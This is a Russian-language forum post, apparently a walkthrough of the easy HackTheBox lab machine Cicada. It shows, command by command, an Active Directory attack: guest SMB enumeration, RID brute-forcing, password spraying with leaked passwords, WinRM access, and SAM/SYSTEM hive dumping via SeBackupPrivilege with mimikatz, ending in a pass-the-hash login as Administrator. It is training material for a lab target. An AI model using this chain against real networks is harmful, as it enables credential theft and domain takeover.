- Регистрация
- 4 Фев 2025
- Сообщения
- 18
- Реакции
- 2
Наша цель — прохождение машины Cicada с учебной площадки
Вы должны быть зарегистрированы для просмотра ссылок
. Уровень задания — легкий.
Сегодня на примере несложной лабораторной работы я продемонстрирую базовые техники работы с Active Directory при пентестах. Мы получим информацию через нулевую сессию SMB, проведем разведку и захватим аккаунт администратора через привилегию SeBackupPrivilege.
Вы должны быть зарегистрированы для просмотра ссылок
. Уровень задания — легкий.Разведка
Сканирование портов
Добавляем IP-адрес машины в /etc/hosts:
Код:
10.10.11.35 cicada.htbСправка: сканирование портов
Сканирование портов — стандартный первый шаг при любой атаке. Он позволяет атакующему узнать, какие службы на хосте принимают соединение. На основе этой информации выбирается следующий шаг к получению точки входа.Наиболее известный инструмент для сканирования — это Nmap. Улучшить результаты его работы ты можешь при помощи следующего скрипта:
Bash:
#!/bin/bash
ports=$(nmap -p- --min-rate=500 $1 | grep ^[0-9] | cut -d '/' -f 1 | tr '
' ',' | sed s/,$//)
nmap -p$ports -A $1
Вы должны быть зарегистрированы для просмотра вложений
Сканер нашел девять открытых портов:
- 88 — Kerberos;
- 135 — Microsoft RPC;
- 139 — NetBIOS, NetLogon;
- 389 — LDAP;
- 445 — SMB;
- 593 (HTTP-RPC-EPMAP) — используется в службах DCOM и MS Exchange;
- 3268 (LDAP) — для доступа к Global Catalog от клиента к контроллеру;
- 3269 (LDAPS) — для доступа к Global Catalog от клиента к контроллеру через защищенное соединение;
- 5985 — служба удаленного управления WinRM.
Код:
nxc smb 10.10.11.35 -u guest -p ''
Вы должны быть зарегистрированы для просмотра вложений
Авторизация прошла успешно, попробуем собрать данные.
Точка входа
Для начала получим список общих ресурсов SMB. Для NetExec есть параметр --shares.
Код:
nxc smb 10.10.11.35 -u guest -p '' --shares
Вы должны быть зарегистрированы для просмотра вложений
Также мы можем перебрать RID объектов домена и получить имена групп и пользователей домена. Для этого используем параметр --rid-brute.
Код:
nxc smb 10.10.11.35 -u guest -p '' --rid-brute
Вы должны быть зарегистрированы для просмотра вложений
Сохраняем пользователей в отдельный файл, так как они нам еще пригодятся. А затем с помощью
Вы должны быть зарегистрированы для просмотра ссылок
и пакета Impacket просматриваем содержимое общего каталога HR, так как он доступен для чтения. Там всего один файл, скачиваем его на локальный хост.
Код:
smbclient.py ./guest:''@10.10.11.35
use HR
get Notice from HR.txtМожно предположить, что есть пользователи, которые его не изменили. Проспреим найденный пароль по всем полученным ранее логинам. Для этого снова обратимся к NetExec. Чтобы перебор продолжался после обнаружения первой валидной учетки, нужно указать параметр --continue-on-success.
Код:
nxc smb 10.10.11.35 -u users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8' --continue-on-success
Вы должны быть зарегистрированы для просмотра вложений
В результате получаем первую полноценную учетную запись, с которой можно опрашивать контроллер домена.
Первым делом обратим внимание на описание учетных записей пользователей, поскольку там часто можно найти интересную информацию. Для получения важной информации о пользователях применяем параметр --users.
Код:
nxc smb 10.10.11.35 -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' --users
Вы должны быть зарегистрированы для просмотра вложений
В описании учетной записи david.orelious находим еще один пароль. Его тоже прогоняем по всем логинам.
Код:
nxc smb 10.10.11.35 -u users.txt -p 'aRt$Lp#7t*VQ!3' --continue-on-success
Вы должны быть зарегистрированы для просмотра вложений
Однако получаем подтверждение только для учетной записи david.orelious.
Продвижение
Так как мы компрометируем новые учетные записи, стоит обязательно проверить их права на общие SMB-ресурсы. От имени пользователя michael.wrightson ничего нового не увидим, а вот учетной записи david.orelious доступен для чтения общий каталог DEV.
Код:
nxc smb 10.10.11.35 -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' --shares
Вы должны быть зарегистрированы для просмотра вложений
Код:
nxc smb 10.10.11.35 -u 'david.orelious' -p 'aRt$Lp#7t*VQ!3' --shares
Вы должны быть зарегистрированы для просмотра вложений
Подключаемся к SMB и проверяем содержимое. В каталоге Dev находится скрипт на PowerShell, который мы, конечно же, забираем на локальную машину для анализа.
Код:
smbclient.py 'cicada.htb/david.orelious:aRt$Lp#7t*VQ!3'@10.10.11.35
Вы должны быть зарегистрированы для просмотра вложений
Код:
nxc smb 10.10.11.35 -u users.txt -p 'Q!3@Lp#M6b*7t*Vt' --continue-on-success
Вы должны быть зарегистрированы для просмотра вложений
Проверим, нет ли у этой учетки возможности управления через службу WinRM. NetExec поддерживает в том числе и протокол WinRM.
Код:
nxc winrm 10.10.11.35 -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt'
Вы должны быть зарегистрированы для просмотра ссылок
и добываем первый флаг.
Код:
evil-winrm -i 10.10.11.35 -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt'
Вы должны быть зарегистрированы для просмотра вложений
Локальное повышение привилегий
Получим информацию о пользователе, его привилегиях и группах с помощью команды whoami /all.
Вы должны быть зарегистрированы для просмотра вложений
Пользователь состоит в группе Backup Operators, и у него активна привилегия SeBackupPrivilege. Эта привилегия позволяет процессу получить доступ к любому файлу в системе для резервного копирования в режиме обхода списков управления доступом (ACL). SeBackupPrivilege опасна и позволяет нам сдампить такие файлы, как SAM и SYSTEM. Из файла SAM можно извлечь зашифрованные хеши паролей учетных записей, а из SYSTEM — ключи для расшифрования этих хешей. Скопируем файлы из реестра HKLM.
Код:
reg save hklm\sam .\sam
reg save hklm\system .\system
Вы должны быть зарегистрированы для просмотра ссылок
для получения локальных учетных данных.
Код:
.\mimi.exe "lsadump::sam /sam:sam /system:system"
Вы должны быть зарегистрированы для просмотра вложений
В выводе находим хеш пароля учетной записи Administrator и с его помощью авторизуемся в службе WinRM.
Код:
evil-winrm -i 10.10.11.35 -u Administrator -H 2b87e7c93a3e8a0ea4a581937016f341
Вы должны быть зарегистрированы для просмотра вложений
Машина захвачена!